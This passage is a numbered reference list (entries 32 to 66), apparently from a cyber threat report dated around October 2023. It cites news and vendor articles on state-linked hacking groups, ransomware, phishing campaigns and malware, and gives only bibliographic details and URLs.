[32] V. Pandagle, “Five Families Targets Taiwanese Computer Parts Manufacturer Biostar,” The Cyber Express, Sep. 08, 2023. Available: https://thecyberexpress.com/the-biostar-cyber-attack-five-families/. [Accessed: Oct. 01, 2023]

[33] A. Khaitan, “Indian Cyber Force Hackers Reveal Timeline for Targeted Cyber Attacks on Pakistan, China,” The Cyber Express, Sep. 06, 2023. Available: https://thecyberexpress.com/indian-cyber-force-targeted-cyber-attacks/. [Accessed: Oct. 01, 2023]

[34] “Researchers Warn of Cyber Weapons Used by Lazarus Group’s Andariel Cluster,” The Hacker News, Sep. 05, 2023. Available: https://thehackernews.com/2023/09/researchers-warn-of-cyber-weapons-used.html. [Accessed: Oct. 01, 2023]

[35] Microsoft Threat Intelligence, “Flax Typhoon using legitimate software to quietly access Taiwanese organizations,” Microsoft Security Blog, Aug. 24, 2023. Available: https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/. [Accessed: Oct. 01, 2023]

[36] “New SuperBear Trojan Emerges in Targeted Phishing Attack on South Korean Activists,” The Hacker News, Sep. 01, 2023. Available: https://thehackernews.com/2023/09/new-superbear-trojan-emerges-in.html. [Accessed: Oct. 01, 2023]

[37] D. Robinson, “Pot calls the kettle hack as China claims Uncle Sam did digital sneak peek first,” The Register, Sep. 20, 2023. Available: https://www.theregister.com/2023/09/20/huawei_china_claims/. [Accessed: Oct. 01, 2023]

[38] “Sophisticated Phishing Campaign Targeting Chinese Users with ValleyRAT and Gh0st RAT,” The Hacker News, Sep. 20, 2023. Available: https://thehackernews.com/2023/09/sophisticated-phishing-campaign_20.html. [Accessed: Oct. 01, 2023]

[39] “W3LL Store: How a Secret Phishing Syndicate Targets 8,000+ Microsoft 365 Accounts,” The Hacker News, Sep. 06, 2023. Available: https://thehackernews.com/2023/09/w3ll-store-how-secret-phishing.html. [Accessed: Oct. 01, 2023]

[40] The CyberWire, “Ukraine at D+567.” Available: https://thecyberwire.com/stories/48e9cdff28e944a6b1a20214cbbc126f/ukraine-at-d567

[41] The CyberWire, “Ukraine at D+564.” Available: https://thecyberwire.com/stories/2b8ee4d70b8a47eb98b63aedd543eba4/ukraine-at-d564

[42] “Classiscam Scam-as-a-Service Raked $64.5 Million During the COVID-19 Pandemic,” The Hacker News, Sep. 01, 2023. Available: https://thehackernews.com/2023/09/classiscam-scam-as-service-raked-645.html. [Accessed: Oct. 02, 2023]

[43] The CyberWire, “Research Briefing” (newsletter). Available: https://thecyberwire.com/newsletters/research-briefing/5/38

[44] V. Pandagle, “OpIndonesia: Ministry of Public Works and Housing Faces DDoS Attack by Garnesia Team,” The Cyber Express, Sep. 18, 2023. Available: https://thecyberexpress.com/ministry-of-public-works-cyber-attack/. [Accessed: Oct. 01, 2023]

[45] The CyberWire, “Earth Lusca’s cyberespionage techniques.” Available: https://thecyberwire.com/stories/f4a30f84eb754a21b4d200300a4c7abb/earth-luscas-cyberespionage-techniques

[46] I. Ilascu, “W3LL phishing kit hijacks thousands of Microsoft 365 accounts, bypasses MFA,” BleepingComputer, Sep. 06, 2023. Available: https://www.bleepingcomputer.com/news/security/w3ll-phishing-kit-hijacks-thousands-of-microsoft-365-accounts-bypasses-mfa/. [Accessed: Oct. 01, 2023]

[47] “MMRat Android Trojan Executes Remote Financial Fraud Through Accessibility Feature,” The Hacker News, Aug. 2023. Available: https://thehackernews.com/2023/08/mmrat-android-trojan-executes-remote.html

[48] M. J. Schwartz and R. Ross, “LokiBot Information Stealer Packs Fresh Infection Strategies,” GovInfoSecurity. Available: https://www.govinfosecurity.com/lokibot-information-stealer-packs-fresh-infection-strategies-a-23079. [Accessed: Oct. 01, 2023]

[49] M. Bagwe and R. Ross, “Australian Law Firm Hack Affected 65 Government Agencies,” GovInfoSecurity. Available: https://www.govinfosecurity.com/australian-law-firm-hack-affected-65-government-agencies-a-23110. [Accessed: Oct. 02, 2023]

[50] “Iranian Nation-State Actor OilRig Targets Israeli Organizations,” The Hacker News, Sep. 22, 2023. Available: https://thehackernews.com/2023/09/iranian-nation-state-actor-oilrig.html. [Accessed: Oct. 02, 2023]

[51] J. Marusak, “Russian cyber thieves linked to personal data breach at North Carolina hospitals,” Yahoo News, Sep. 16, 2023. Available: https://news.yahoo.com/russian-cyber-thieves-linked-personal-202630737.html. [Accessed: Oct. 02, 2023]

[52] T. Ganacharya, “Microsoft 365 Defender demonstrates 100 percent protection coverage in the 2023 MITRE Engenuity ATT&CK® Evaluations: Enterprise,” Microsoft Security Blog, Sep. 20, 2023. Available: https://www.microsoft.com/en-us/security/blog/2023/09/20/microsoft-365-defender-demonstrates-100-percent-protection-coverage-in-the-2023-mitre-engenuity-attck-evaluations-enterprise/. [Accessed: Oct. 02, 2023]

[53] B. Toulas, “Microsoft: Stealthy Flax Typhoon hackers use LOLBins to evade detection,” BleepingComputer, Aug. 25, 2023. Available: https://www.bleepingcomputer.com/news/security/microsoft-stealthy-flax-typhoon-hackers-use-lolbins-to-evade-detection/. [Accessed: Oct. 02, 2023]

[54] “NY: Carthage, Claxton-Hepburn hospitals target of cyber attack,” DataBreaches.net. Available: https://www.databreaches.net/ny-carthage-claxton-hepburn-hospitals-target-of-cyber-attack/. [Accessed: Sep. 29, 2023]

[55] M. K. McGee and R. Ross, “Just Kids Dental Says Nearly 130K People Affected by Attack,” GovInfoSecurity. Available: https://www.govinfosecurity.com/just-kids-dental-says-nearly-130k-people-affected-by-attack-a-23019. [Accessed: Oct. 01, 2023]

[56] “More victims of MOVEit breach are revealed: Nuance discloses for covered entities (UPDATE 1),” DataBreaches.net. Available: https://www.databreaches.net/more-victims-of-moveit-breach-are-revealed-nuance-discloses-for-covered-entities/. [Accessed: Oct. 02, 2023]

[57] L. Abrams, “Ragnar Locker claims attack on Israel’s Mayanei Hayeshua hospital,” BleepingComputer, Sep. 08, 2023. Available: https://www.bleepingcomputer.com/news/security/ragnar-locker-claims-attack-on-israels-mayanei-hayeshua-hospital/. [Accessed: Oct. 02, 2023]

[58] V. Pandagle, “T-Mobile Cyber Attack or Glitch? 8 Alleged Breaches Since 2018 as Company Denies Allegations,” The Cyber Express, Sep. 22, 2023. Available: https://thecyberexpress.com/t-mobile-cyber-attack-glitch-firm-responds/. [Accessed: Oct. 02, 2023]

[59] B. Toulas, “‘Sandman’ hackers backdoor telcos with new LuaDream malware,” BleepingComputer, Sep. 21, 2023. Available: https://www.bleepingcomputer.com/news/security/sandman-hackers-backdoor-telcos-with-new-luadream-malware/. [Accessed: Oct. 02, 2023]

[60] I. Arghire, “Iranian Cyberspies Deployed New Backdoor to 34 Organizations,” SecurityWeek, Sep. 12, 2023. Available: https://www.securityweek.com/iranian-cyberspies-deployed-new-backdoor-to-34-organizations/. [Accessed: Oct. 02, 2023]

[61] The CyberWire, “Daily Briefing” (newsletter). Available: https://thecyberwire.com/newsletters/daily-briefing/12/177

[62] B. Toulas, “Hackers backdoor telecom providers with new HTTPSnoop malware,” BleepingComputer, Sep. 19, 2023. Available: https://www.bleepingcomputer.com/news/security/hackers-backdoor-telecom-providers-with-new-httpsnoop-malware/. [Accessed: Oct. 02, 2023]

[63] A. Khaitan, “Monti Ransomware Group Claims Auckland University of Technology Data Breach,” The Cyber Express, Sep. 22, 2023. Available: https://thecyberexpress.com/auckland-university-of-technology-breach-monti/. [Accessed: Oct. 02, 2023]

[64] The CyberWire, “Daily Briefing” (newsletter). Available: https://thecyberwire.com/newsletters/daily-briefing/12/174

[65] “Charming Kitten’s New Backdoor ‘Sponsor’ Targets Brazil, Israel, and U.A.E,” The Hacker News, Sep. 11, 2023. Available: https://thehackernews.com/2023/09/charming-kitens-new-backdoor-sponsor.html. [Accessed: Oct. 02, 2023]

[66] A. M.-D. La Cruz, 219 News Now 9/20/2023, (Sep. 20, 2023). Available: https://www.nwitimes.com/news/local/education/crown-point-schools-victim-of-ransomware-attack/article_1ee07b98-57ff-11ee-bb41-5fe43ab302d8.html. [Accessed: Oct. 02, 2023]